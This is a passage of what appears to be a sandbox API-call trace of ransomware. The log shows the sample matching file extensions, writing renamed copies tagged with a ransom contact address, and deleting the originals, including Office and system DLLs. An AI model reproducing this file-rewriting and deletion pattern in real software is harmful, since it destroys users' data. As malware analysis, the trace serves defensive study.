[0052.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.195] lstrlenW (lpString=".dbf") returned 4 [0052.195] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.195] lstrlenW (lpString=".1cd") returned 4 [0052.195] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.195] lstrlenW (lpString=".jpg") returned 4 [0052.195] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.196] lstrlenW (lpString=".doc") returned 4 [0052.196] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.196] lstrlenW (lpString=".docx") returned 5 [0052.196] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.196] lstrlenW (lpString=".pdf") returned 4 [0052.196] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.196] lstrlenW (lpString=".xls") returned 4 [0052.196] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.196] lstrlenW (lpString=".xlsx") returned 5 [0052.196] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.196] lstrlenW (lpString=".ppt") returned 4 [0052.196] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.196] lstrlenW (lpString=".zip") returned 4 [0052.196] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.196] lstrlenW (lpString=".rar") returned 4 [0052.196] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.196] lstrlenW (lpString=".bz2") returned 4 [0052.196] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.196] lstrlenW (lpString=".7z") returned 3 [0052.196] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0052.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.196] lstrlenW (lpString=".dbf") returned 4 [0052.196] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.196] lstrlenW (lpString=".1cd") returned 4 [0052.196] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.197] lstrlenW (lpString=".jpg") returned 4 [0052.197] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.197] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0052.197] lstrlenW (lpString="PidGenX.dll") returned 11 [0052.197] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0052.197] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=1463568) returned 1 [0052.197] CloseHandle (hObject=0x1b0) returned 1 [0052.197] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0052.197] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.198] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0052.198] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.198] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.198] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0052.198] GetLastError () returned 0x0 [0052.198] ReadFile (in: hFile=0x1b0, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0052.550] WriteFile (in: hFile=0x1a8, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0052.578] ReadFile (in: hFile=0x1b0, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0x65520, lpOverlapped=0x0) returned 1 [0052.850] WriteFile (in: hFile=0x1a8, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0052.868] ReadFile (in: hFile=0x1b0, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.868] WriteFile (in: hFile=0x1a8, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xea, lpOverlapped=0x0) returned 1 [0052.868] SetEndOfFile (hFile=0x1a8) returned 1 [0052.868] CloseHandle (hObject=0x1a8) returned 1 [0052.868] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.868] SetEndOfFile (hFile=0x1b0) returned 1 [0052.873] CloseHandle (hObject=0x1b0) returned 1 [0052.873] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0052.873] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0052.873] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.873] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.873] lstrlenW (lpString=".doc") returned 4 [0052.873] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.873] lstrlenW (lpString=".docx") returned 5 [0052.873] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0052.873] lstrlenW (lpString=".pdf") returned 4 [0052.873] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.873] lstrlenW (lpString=".xls") returned 4 [0052.873] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.874] lstrlenW (lpString=".xlsx") returned 5 [0052.874] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0052.874] lstrlenW (lpString=".ppt") returned 4 [0052.874] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.874] lstrlenW (lpString=".zip") returned 4 [0052.874] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.874] lstrlenW (lpString=".rar") returned 4 [0052.874] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.874] lstrlenW (lpString=".bz2") returned 4 [0052.874] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.874] lstrlenW (lpString=".7z") returned 3 [0052.874] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.874] lstrlenW (lpString=".dbf") returned 4 [0052.874] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.874] lstrlenW (lpString=".1cd") returned 4 [0052.874] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.874] lstrlenW (lpString=".jpg") returned 4 [0052.874] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.874] lstrlenW (lpString=".doc") returned 4 [0052.874] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.874] lstrlenW (lpString=".docx") returned 5 [0052.874] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0052.875] lstrlenW (lpString=".pdf") returned 4 [0052.875] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.875] lstrlenW (lpString=".xls") returned 4 [0052.875] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.875] lstrlenW (lpString=".xlsx") returned 5 [0052.875] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0052.875] lstrlenW (lpString=".ppt") returned 4 [0052.875] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.875] lstrlenW (lpString=".zip") returned 4 [0052.875] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.875] lstrlenW (lpString=".rar") returned 4 [0052.875] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.875] lstrlenW (lpString=".bz2") returned 4 [0052.875] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.875] lstrlenW (lpString=".7z") returned 3 [0052.875] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.875] lstrlenW (lpString=".dbf") returned 4 [0052.875] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.875] lstrlenW (lpString=".1cd") returned 4 [0052.875] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0052.875] lstrlenW (lpString=".jpg") returned 4 [0052.875] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.876] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0052.876] lstrlenW (lpString="medical lectures.exe") returned 20 [0052.876] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\medical lectures.exe" (normalized: "c:\\program files\\common files\\medical lectures.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0052.876] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=75776) returned 1 [0052.876] CloseHandle (hObject=0x1b0) returned 1 [0052.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\medical lectures.exe" (normalized: "c:\\program files\\common files\\medical lectures.exe")) returned 0x20 [0052.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\medical lectures.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\medical lectures.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.876] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\medical lectures.exe" (normalized: "c:\\program files\\common files\\medical lectures.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.876] lstrlenW (lpString=".doc") returned 4 [0052.876] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.876] lstrlenW (lpString=".docx") returned 5 [0052.876] lstrcmpiW (lpString1=".docx", lpString2="s.exe") returned -1 [0052.877] lstrlenW (lpString=".pdf") returned 4 [0052.877] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.877] lstrlenW (lpString=".xls") returned 4 [0052.877] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.877] lstrlenW (lpString=".xlsx") returned 5 [0052.877] lstrcmpiW (lpString1=".xlsx", lpString2="s.exe") returned -1 [0052.877] lstrlenW (lpString=".ppt") returned 4 [0052.877] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.877] lstrlenW (lpString=".zip") returned 4 [0052.877] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.877] lstrlenW (lpString=".rar") returned 4 [0052.877] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.877] lstrlenW (lpString=".bz2") returned 4 [0052.877] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.877] lstrlenW (lpString=".7z") returned 3 [0052.877] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.877] lstrlenW (lpString=".dbf") returned 4 [0052.877] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.877] lstrlenW (lpString=".1cd") returned 4 [0052.877] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.877] lstrlenW (lpString=".jpg") returned 4 [0052.877] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.877] lstrlenW (lpString=".doc") returned 4 [0052.878] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.878] lstrlenW (lpString=".docx") returned 5 [0052.878] lstrcmpiW (lpString1=".docx", lpString2="s.exe") returned -1 [0052.878] lstrlenW (lpString=".pdf") returned 4 [0052.878] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.878] lstrlenW (lpString=".xls") returned 4 [0052.878] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.878] lstrlenW (lpString=".xlsx") returned 5 [0052.878] lstrcmpiW (lpString1=".xlsx", lpString2="s.exe") returned -1 [0052.878] lstrlenW (lpString=".ppt") returned 4 [0052.878] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.878] lstrlenW (lpString=".zip") returned 4 [0052.878] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.878] lstrlenW (lpString=".rar") returned 4 [0052.878] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.878] lstrlenW (lpString=".bz2") returned 4 [0052.878] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.878] lstrlenW (lpString=".7z") returned 3 [0052.878] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.878] lstrlenW (lpString=".dbf") returned 4 [0052.878] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.878] lstrlenW (lpString=".1cd") returned 4 [0052.878] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\medical lectures.exe") returned 50 [0052.879] lstrlenW (lpString=".jpg") returned 4 [0052.879] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.879] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0052.879] lstrlenW (lpString="DBGHELP.DLL") returned 11 [0052.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0054.436] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=1369952) returned 1 [0054.436] CloseHandle (hObject=0x1e8) returned 1 [0054.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 0x20 [0054.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0054.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0054.492] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.492] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0055.328] GetLastError () returned 0x0 [0055.328] ReadFile (in: hFile=0x21c, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0055.355] WriteFile (in: hFile=0x1bc, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0055.845] ReadFile (in: hFile=0x21c, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0x4e770, lpOverlapped=0x0) returned 1 [0055.863] WriteFile (in: hFile=0x1bc, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0x4e780, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0x4e780, lpOverlapped=0x0) returned 1 [0055.874] ReadFile (in: hFile=0x21c, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.874] WriteFile (in: hFile=0x1bc, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xea, lpOverlapped=0x0) returned 1 [0055.874] SetEndOfFile (hFile=0x1bc) returned 1 [0055.874] CloseHandle (hObject=0x1bc) returned 1 [0055.875] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.875] SetEndOfFile (hFile=0x21c) returned 1 [0055.879] CloseHandle (hObject=0x21c) returned 1 [0055.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0055.880] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 1 [0055.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0055.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0055.880] lstrlenW (lpString=".doc") returned 4 [0055.880] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.880] lstrlenW (lpString=".docx") returned 5 [0055.880] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0055.880] lstrlenW (lpString=".pdf") returned 4 [0055.880] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.880] lstrlenW (lpString=".xls") returned 4 [0055.880] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.880] lstrlenW (lpString=".xlsx") returned 5 [0055.880] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0055.880] lstrlenW (lpString=".ppt") returned 4 [0055.881] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0055.881] lstrlenW (lpString=".zip") returned 4 [0055.881] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.881] lstrlenW (lpString=".rar") returned 4 [0055.881] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.089] lstrlenW (lpString=".bz2") returned 4 [0056.090] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.090] lstrlenW (lpString=".7z") returned 3 [0056.090] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0056.090] lstrlenW (lpString=".dbf") returned 4 [0056.090] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0056.090] lstrlenW (lpString=".1cd") returned 4 [0056.090] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0056.090] lstrlenW (lpString=".jpg") returned 4 [0056.090] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0056.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0056.090] lstrlenW (lpString=".doc") returned 4 [0056.090] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.090] lstrlenW (lpString=".docx") returned 5 [0056.090] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0056.090] lstrlenW (lpString=".pdf") returned 4 [0056.090] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.090] lstrlenW (lpString=".xls") returned 4 [0056.090] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.090] lstrlenW (lpString=".xlsx") returned 5 [0056.090] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0056.091] lstrlenW (lpString=".ppt") returned 4 [0056.091] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0056.091] lstrlenW (lpString=".zip") returned 4 [0056.091] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.091] lstrlenW (lpString=".rar") returned 4 [0056.091] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.091] lstrlenW (lpString=".bz2") returned 4 [0056.091] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.091] lstrlenW (lpString=".7z") returned 3 [0056.091] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0056.091] lstrlenW (lpString=".dbf") returned 4 [0056.091] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 